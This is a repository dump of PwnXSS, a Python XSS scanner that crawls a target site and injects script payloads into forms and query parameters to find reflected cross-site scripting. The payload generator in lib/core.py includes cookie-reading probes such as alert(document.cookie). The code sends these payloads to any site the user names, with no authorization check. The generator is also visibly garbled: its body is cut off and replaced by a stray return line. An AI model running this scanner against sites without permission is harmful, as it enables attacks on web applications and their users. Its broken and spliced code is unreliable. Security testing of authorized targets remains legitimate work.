├── .github ├── FUNDING.yml └── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md ├── LICENSE ├── README.md ├── images ├── logo.png └── screenshot.png ├── lib ├── core.py ├── crawler │ └── crawler.py └── helper │ ├── Log.py │ └── helper.py ├── pwnxss.py └── requirements.txt /.github/FUNDING.yml: -------------------------------------------------------------------------------- 1 | ko_fi: duckoverflow 2 | custom: ["https://www.paypal.com/paypalme/auliarakheen", "https://saweria.co/duckoverflow"] 3 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the bug** 11 | A clear and concise description of what the bug is. 12 | 13 | **To Reproduce** 14 | Steps to reproduce the behavior: 15 | 1. Go to '...' 16 | 2. Click on '....' 17 | 3. Scroll down to '....' 18 | 4. See error 19 | 20 | **Expected behavior** 21 | A clear and concise description of what you expected to happen. 22 | 23 | **Screenshots** 24 | If applicable, add screenshots to help explain your problem. 25 | 26 | **Desktop (please complete the following information):** 27 | - OS: [e.g. iOS] 28 | - Browser [e.g. chrome, safari] 29 | - Version [e.g. 22] 30 | 31 | **Smartphone (please complete the following information):** 32 | - Device: [e.g. iPhone6] 33 | - OS: [e.g. iOS8.1] 34 | - Browser [e.g. stock browser, safari] 35 | - Version [e.g. 22] 36 | 37 | **Additional context** 38 | Add any other context about the problem here. 
39 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: '' 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 12 | 13 | **Describe the solution you'd like** 14 | A clear and concise description of what you want to happen. 15 | 16 | **Describe alternatives you've considered** 17 | A clear and concise description of any alternative solutions or features you've considered. 18 | 19 | **Additional context** 20 | Add any other context or screenshots about the feature request here. 21 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 menkrep1337 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

2 |
3 | A powerful XSS scanner written in Python 3.7
4 | 5 | 6 | ## Installing 7 | 8 | Requirements:
9 | 10 |

  • BeautifulSoup4
11 | 12 | ```bash 13 | pip install bs4 14 | ``` 15 |
  • requests
16 | 17 | ```bash 18 | pip install requests 19 | ``` 20 |
  • Python 3.7
21 |
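Before the first run, you can sanity-check that both dependencies import cleanly. A small illustrative snippet (not part of the PwnXSS codebase):

```python
# Check that PwnXSS's runtime dependencies are importable.
import importlib

def check_deps(modules=("bs4", "requests")):
    """Map each module name to True/False depending on importability."""
    status = {}
    for name in modules:
        try:
            importlib.import_module(name)
            status[name] = True
        except ImportError:
            status[name] = False
    return status

missing = [name for name, ok in check_deps().items() if not ok]
if missing:
    print("Install missing packages: pip install " + " ".join(missing))
```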
    22 | Commands: 23 | 24 | ```bash 25 | git clone https://github.com/pwn0sec/PwnXSS 26 | chmod -R 755 PwnXSS 27 | cd PwnXSS 28 | python3 pwnxss.py --help 29 | ``` 30 | ## Usage 31 | Basic usage: 32 | 33 | ```bash 34 | python3 pwnxss.py -u http://testphp.vulnweb.com 35 | ``` 36 |
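Under the hood, the basic scan crawls links and swaps every query-string value for a probe payload, then checks the response for a reflection (see lib/core.py). A simplified sketch of that substitution step — the function name here is illustrative, not part of the tool's API:

```python
# Replace every query parameter value with an XSS probe, similar to what
# lib/core.py does via parse_qs/urlencode before fetching the page and
# looking for the probe in the response body.
from urllib.parse import urlparse, parse_qs, urlencode, urlunparse

def inject_payload(url: str, payload: str) -> str:
    """Return `url` with each query parameter value set to `payload`."""
    parts = urlparse(url)
    params = {name: payload for name in parse_qs(parts.query)}
    return urlunparse(parts._replace(query=urlencode(params)))

# Example: both `cat` and `order` receive the probe (URL-encoded by urlencode).
print(inject_payload("http://testphp.vulnweb.com/list.php?cat=1&order=asc", "PROBE"))
```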
    37 | Advanced usage: 38 | 39 | ```bash 40 | python3 pwnxss.py --help 41 | ``` 42 | 43 | ## Main features 44 | 45 | * Crawls every link on a website (crawler engine) 46 | * Supports both POST and GET forms 47 | * Many customizable settings 48 | * Advanced error handling 49 | * Multiprocessing support ✔️ 50 | * And more... 51 | 52 | 53 | ## Screenshot 54 | 55 | 56 | 57 | ## Roadmap 58 | 59 | v0.3B: 60 | ------ 61 |
  • Added custom options (--proxy, --user-agent, etc.)
62 |
    63 | 64 | v0.3B Patch: 65 | ------ 66 |
  • Added support for forms with method GET
67 | 68 | v0.4B: 69 | ------ 70 |
  • Improved error handling
71 |
  • Multiple parameters for the GET method are now supported
72 | 73 | v0.5 Release (Final): 74 | ------ 75 | * Bug fixes 76 | * Cookies are now supported (--cookie {}) 77 | ## Note 78 | * Sorry for my bad English 79 | * Running PwnXSS in the Windows 10 terminal may produce untidy output 80 | * DOM-based XSS is not supported yet 81 | 82 | -------------------------------------------------------------------------------- /images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn0sec/PwnXSS/4f75e6a99d24d7fc8836aa1cdf83472f79925528/images/logo.png -------------------------------------------------------------------------------- /images/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn0sec/PwnXSS/4f75e6a99d24d7fc8836aa1cdf83472f79925528/images/screenshot.png -------------------------------------------------------------------------------- /lib/core.py: -------------------------------------------------------------------------------- 1 | from lib.helper.helper import * 2 | from random import randint 3 | from bs4 import BeautifulSoup 4 | from urllib.parse import urljoin,urlparse,parse_qs,urlencode 5 | from lib.helper.Log import * 6 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 7 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 8 | 9 | class core: 10 | 11 | @classmethod 12 | def generate(self,eff): 13 | FUNCTION=[ 14 | "prompt(5000/200)", 15 | "alert(6000/3000)", 16 | "alert(document.cookie)", 17 | "prompt(document.cookie)", 18 | "console.log(5000/3000)" 19 | ] 20 | if eff == 1: 21 | return "" 37 | 38 | @classmethod 39 | def post_method(self): 40 | bsObj=BeautifulSoup(self.body,"html.parser") 41 | forms=bsObj.find_all("form",method=True) 42 | 43 | for form in forms: 44 | try: 45 | action=form["action"] 46 | except KeyError: 47 | action=self.url 48 | 49 | if form["method"].lower().strip() == "post": 50 | Log.warning("Target has
a form with POST method: "+C+urljoin(self.url,action)) 51 | Log.info("Collecting form input keys...") 52 | 53 | keys={} 54 | for key in form.find_all(["input","textarea"]): 55 | try: 56 | if key["type"] == "submit": 57 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+"") 58 | keys.update({key["name"]:key["name"]}) 59 | 60 | else: 61 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload) 62 | keys.update({key["name"]:self.payload}) 63 | 64 | except Exception as e: 65 | Log.info("Internal error: "+str(e)) 66 | 67 | Log.info("Sending payload (POST) method...") 68 | req=self.session.post(urljoin(self.url,action),data=keys) 69 | if self.payload in req.text: 70 | Log.high("Detected XSS (POST) at "+urljoin(self.url,req.url)) 71 | file = open("xss.txt", "a") 72 | file.write(str(req.url)+"\n\n") 73 | file.close() 74 | Log.high("Post data: "+str(keys)) 75 | else: 76 | Log.info("Payload sent (POST), but reflection was not confirmed...") 77 | 78 | @classmethod 79 | def get_method_form(self): 80 | bsObj=BeautifulSoup(self.body,"html.parser") 81 | forms=bsObj.find_all("form",method=True) 82 | 83 | for form in forms: 84 | try: 85 | action=form["action"] 86 | except KeyError: 87 | action=self.url 88 | 89 | if form["method"].lower().strip() == "get": 90 | Log.warning("Target has a form with GET method: "+C+urljoin(self.url,action)) 91 | Log.info("Collecting form input keys...") 92 | 93 | keys={} 94 | for key in form.find_all(["input","textarea"]): 95 | try: 96 | if key["type"] == "submit": 97 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+"") 98 | keys.update({key["name"]:key["name"]}) 99 | 100 | else: 101 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload) 102 | keys.update({key["name"]:self.payload}) 103 | 104 | except Exception as e: 105 | Log.info("Internal error: "+str(e)) 106 | try: 107 | Log.info("Form key name: "+G+key["name"]+N+" value: "+G+self.payload) 108 | keys.update({key["name"]:self.payload}) 109 | except
KeyError as e: 110 | Log.info("Internal error: "+str(e)) 111 | 112 | Log.info("Sending payload (GET) method...") 113 | req=self.session.get(urljoin(self.url,action),params=keys) 114 | if self.payload in req.text: 115 | Log.high("Detected XSS (GET) at "+urljoin(self.url,req.url)) 116 | file = open("xss.txt", "a") 117 | file.write(str(req.url)+"\n\n") 118 | file.close() 119 | Log.high("GET data: "+str(keys)) 120 | else: 121 | Log.info("Payload sent (GET), but reflection was not confirmed...") 122 | 123 | @classmethod 124 | def get_method(self): 125 | bsObj=BeautifulSoup(self.body,"html.parser") 126 | links=bsObj.find_all("a",href=True) 127 | for a in links: 128 | url=a["href"] 129 | if not url.startswith(("mailto:","tel:","javascript:")): # skip non-web schemes (the original chain of `startswith(...) is False` checks was always true) 130 | base=urljoin(self.url,a["href"]) 131 | query=urlparse(base).query 132 | if query != "": 133 | Log.warning("Found link with query: "+G+query+N+" Maybe a vuln XSS point") 134 | 135 | query_payload=query.replace(query[query.find("=")+1:len(query)],self.payload,1) 136 | test=base.replace(query,query_payload,1) 137 | 138 | query_all=base.replace(query,urlencode({x: self.payload for x in parse_qs(query)})) 139 | 140 | Log.info("Query (GET) : "+test) 141 | Log.info("Query (GET) : "+query_all) 142 | 143 | if not url.startswith("mailto:") and not url.startswith("tel:"): 144 | _respon=self.session.get(test,verify=False) 145 | if self.payload in _respon.text or self.payload in self.session.get(query_all).text: 146 | Log.high("Detected XSS (GET) at "+_respon.url) 147 | file = open("xss.txt", "a") 148 | file.write(str(_respon.url)+"\n\n") 149 | file.close() 150 | 151 | else: 152 | Log.info("Payload sent (GET), but reflection was not confirmed...") 153 | else: 154 | Log.info("URL is not an HTTP url, ignoring") 155 | 156 | @classmethod 157 | def main(self,url,proxy,headers,payload,cookie,method=2): 158 | 159 | print(W+"*"*15) 160 | self.payload=payload 161 |
self.url=url 162 | 163 | self.session=session(proxy,headers,cookie) 164 | Log.info("Checking connection to: "+Y+url) 165 | try: 166 | ctr=self.session.get(url) 167 | self.body=ctr.text 168 | except Exception as e: 169 | Log.high("Internal error: "+str(e)) 170 | return 171 | 172 | if ctr.status_code >= 400: 173 | Log.info("Connection failed "+G+str(ctr.status_code)) 174 | return 175 | else: 176 | Log.info("Connection established "+G+str(ctr.status_code)) 177 | 178 | if method >= 2: 179 | self.post_method() 180 | self.get_method() 181 | self.get_method_form() 182 | 183 | elif method == 1: 184 | self.post_method() 185 | 186 | elif method == 0: 187 | self.get_method() 188 | self.get_method_form() 189 | -------------------------------------------------------------------------------- /lib/crawler/crawler.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from lib.helper.Log import * 3 | from lib.helper.helper import * 4 | from lib.core import * 5 | from bs4 import BeautifulSoup 6 | from urllib.parse import urljoin 7 | from multiprocessing import Process 8 | 9 | class crawler: 10 | 11 | visited=[] 12 | 13 | @classmethod 14 | def getLinks(self,base,proxy,headers,cookie): 15 | 16 | lst=[] 17 | 18 | conn=session(proxy,headers,cookie) 19 | text=conn.get(base).text 20 | isi=BeautifulSoup(text,"html.parser") 21 | 22 | 23 | for obj in isi.find_all("a",href=True): 24 | url=obj["href"] 25 | 26 | 27 | if urljoin(base,url) in self.visited: 28 | continue 29 | 30 | elif url.startswith("mailto:") or url.startswith("javascript:"): 31 | continue 32 | # a "://" in the href marks an absolute URL (possibly another host or subdomain); plain paths are treated as same-site 33 | elif url.startswith(base) or "://" not in url : 34 | lst.append(urljoin(base,url)) 35 | self.visited.append(urljoin(base,url)) 36 | 37 | return lst 38 | 39 | @classmethod 40 | def crawl(self,base,depth,proxy,headers,level,method,cookie): 41 | 42 | urls=self.getLinks(base,proxy,headers,cookie)
43 | 44 | for url in urls: 45 | if url.startswith("https://") or url.startswith("http://"): 46 | p=Process(target=core.main, args=(url,proxy,headers,level,cookie,method)) 47 | p.start() 48 | p.join() 49 | if depth != 0: 50 | self.crawl(url,depth-1,proxy,headers,level,method,cookie) # arguments now match the crawl() signature 51 | 52 | else: 53 | continue # skip non-HTTP links instead of aborting the whole crawl 54 | -------------------------------------------------------------------------------- /lib/helper/Log.py: -------------------------------------------------------------------------------- 1 | ''' 2 | PwnXSS - 2019/2020 3 | This project was created by Andripwn with Pwn0sec team. 4 | Copyright under the MIT license 5 | ''' 6 | from lib.helper.helper import * 7 | from datetime import datetime 8 | class Log: 9 | 10 | @classmethod 11 | def info(self,text): 12 | print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+G+"INFO"+N+"] "+text) 13 | 14 | @classmethod 15 | def warning(self,text): 16 | print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+Y+"WARNING"+N+"] "+text) 17 | 18 | @classmethod 19 | def high(self,text): 20 | print("["+Y+datetime.now().strftime("%H:%M:%S")+N+"] ["+R+"CRITICAL"+N+"] "+text) 21 | -------------------------------------------------------------------------------- /lib/helper/helper.py: -------------------------------------------------------------------------------- 1 | ''' 2 | XSSCon - 2019/2020 3 | This project was created by menkrep1337 with 407Aex team.
4 | Copyright under the MIT license 5 | ''' 6 | import requests, json 7 | ##### Colors ####### 8 | N = '\033[0m' 9 | W = '\033[1;37m' 10 | B = '\033[1;34m' 11 | M = '\033[1;35m' 12 | R = '\033[1;31m' 13 | G = '\033[1;32m' 14 | Y = '\033[1;33m' 15 | C = '\033[1;36m' 16 | ##### Styling ###### 17 | underline = "\033[4m" 18 | ##### Default ###### 19 | agent = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} 20 | line="—————————————————" 21 | ##################### 22 | def session(proxies,headers,cookie): 23 | r=requests.Session() 24 | r.proxies=proxies 25 | r.headers=headers 26 | r.cookies.update(json.loads(cookie)) 27 | return r 28 | 29 | logo=G+"""██████╗ ██╗ ██╗███╗ ██╗██╗ ██╗███████╗███████╗ 30 | ██╔══██╗██║ ██║████╗ ██║╚██╗██╔╝██╔════╝██╔════╝ 31 | ██████╔╝██║ █╗ ██║██╔██╗ ██║ ╚███╔╝ ███████╗███████╗ %s 32 | ██╔═══╝ ██║███╗██║██║╚██╗██║ ██╔██╗ ╚════██║╚════██║ %s 33 | ██║ ╚███╔███╔╝██║ ╚████║██╔╝ ██╗███████║███████║ 34 | ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚═╝ ╚═╝╚══════╝╚══════╝ 35 | <<<<<<< STARTING >>>>>>> 36 | """%(R+"{v0.5 Final}"+G,underline+C+"https://github.com/pwn0sec/PwnXSS"+N+G) 37 | 38 | -------------------------------------------------------------------------------- /pwnxss.py: -------------------------------------------------------------------------------- 1 | ''' 2 | PwnXSS - 2019/2020 3 | This project was created by Andripwn with Pwn0sec team.
4 | Copyright under the MIT license 5 | ''' 6 | import argparse 7 | from lib.helper.helper import * 8 | from lib.helper.Log import * 9 | from lib.core import * 10 | from random import randint 11 | from lib.crawler.crawler import * 12 | epilog=""" 13 | Github: https://www.github.com/pwn0sec/PwnXSS 14 | Version: 0.5 Final 15 | """ 16 | def check(getopt): 17 | payload=int(getopt.payload_level) 18 | if payload > 6 and getopt.payload is None: 19 | Log.info("Do you want to use a custom payload (Y/n)?") 20 | answer=input("> "+W) 21 | if answer.lower().strip() == "y": 22 | Log.info("Write the XSS payload below") 23 | payload=input("> "+W) 24 | else: 25 | payload=core.generate(randint(1,6)) 26 | 27 | else: 28 | payload=core.generate(payload) 29 | 30 | return payload if getopt.payload is None else getopt.payload 31 | 32 | def start(): 33 | parse=argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,usage="PwnXSS -u [options]",epilog=epilog,add_help=False) 34 | 35 | pos_opt=parse.add_argument_group("Options") 36 | pos_opt.add_argument("--help",action="store_true",default=False,help="Show usage and help parameters") 37 | pos_opt.add_argument("-u",metavar="",help="Target url (e.g. http://testphp.vulnweb.com)") 38 | pos_opt.add_argument("--depth",metavar="",help="Depth of web pages to crawl. Default: 2",default=2) 39 | pos_opt.add_argument("--payload-level",metavar="",help="Level for the payload generator, 7 for custom payload. {1...6}. Default: 6",default=6) 40 | pos_opt.add_argument("--payload",metavar="",help="Load custom payload directly (e.g. )",default=None) 41 | pos_opt.add_argument("--method",metavar="",help="Method setting(s): \n\t0: GET\n\t1: POST\n\t2: GET and POST (default)",default=2,type=int) 42 | pos_opt.add_argument("--user-agent",metavar="",help="Request user agent (e.g. Chrome/2.1.1/...)",default=agent) 43 | pos_opt.add_argument("--single",metavar="",help="Single scan.
No crawling, just one address") 44 | pos_opt.add_argument("--proxy",default=None,metavar="",help="Set proxy (e.g. {'https':'https://10.10.1.10:1080'})") 45 | pos_opt.add_argument("--about",action="store_true",help="Print information about the PwnXSS tool") 46 | pos_opt.add_argument("--cookie",help="Set cookie (e.g. {'ID':'1094200543'})",default='''{"ID":"1094200543"}''',metavar="") 47 | 48 | getopt=parse.parse_args() 49 | print(logo) 50 | Log.info("Starting PwnXSS...") 51 | if getopt.u: 52 | core.main(getopt.u,getopt.proxy,getopt.user_agent,check(getopt),getopt.cookie,getopt.method) 53 | 54 | crawler.crawl(getopt.u,int(getopt.depth),getopt.proxy,getopt.user_agent,check(getopt),getopt.method,getopt.cookie) 55 | 56 | elif getopt.single: 57 | core.main(getopt.single,getopt.proxy,getopt.user_agent,check(getopt),getopt.cookie,getopt.method) 58 | 59 | elif getopt.about: 60 | print(""" 61 | *************** 62 | Project: PwnXSS 63 | License: MIT 64 | Author: Security Executions Code 65 | Last update: 2019 May 26 66 | Note: Use at your own risk 67 | **************** 68 | """+epilog) 69 | else: 70 | parse.print_help() 71 | 72 | if __name__=="__main__": 73 | start() 74 | 75 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | bs4 >= 0.0.1 2 | requests >= 2.0.0 --------------------------------------------------------------------------------
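A closing note on the core.py listing above: the payload templates returned by generate() were swallowed during HTML extraction (the `<script>`-style strings were parsed as tags), so only the JavaScript function list survives. The general idea can be sketched as follows — these templates are illustrative reconstructions of common XSS probe shapes, not the tool's original strings:

```python
# Illustrative payload wrapper in the spirit of core.generate(): pick a
# markup template by "level" and wrap one JavaScript call in it. Higher
# levels use common filter-evasion variants. The templates below are
# examples only; the originals were lost to HTML stripping in this dump.
TEMPLATES = {
    1: "<script>{js}</script>",
    2: "<sCrIpT>{js}</sCrIpT>",        # case mixing to dodge naive filters
    3: "<img src=x onerror={js}>",     # event-handler based probe
    4: "<svg/onload={js}>",            # attribute without whitespace
}

def generate(level: int, js: str = "alert(document.cookie)") -> str:
    """Return an XSS probe for the given level (falls back to level 1)."""
    return TEMPLATES.get(level, TEMPLATES[1]).format(js=js)

print(generate(3))
```

Higher levels simply trade readability for a better chance of slipping past simple blacklist filters; the reflection check in core.py works the same way regardless of which template produced the probe.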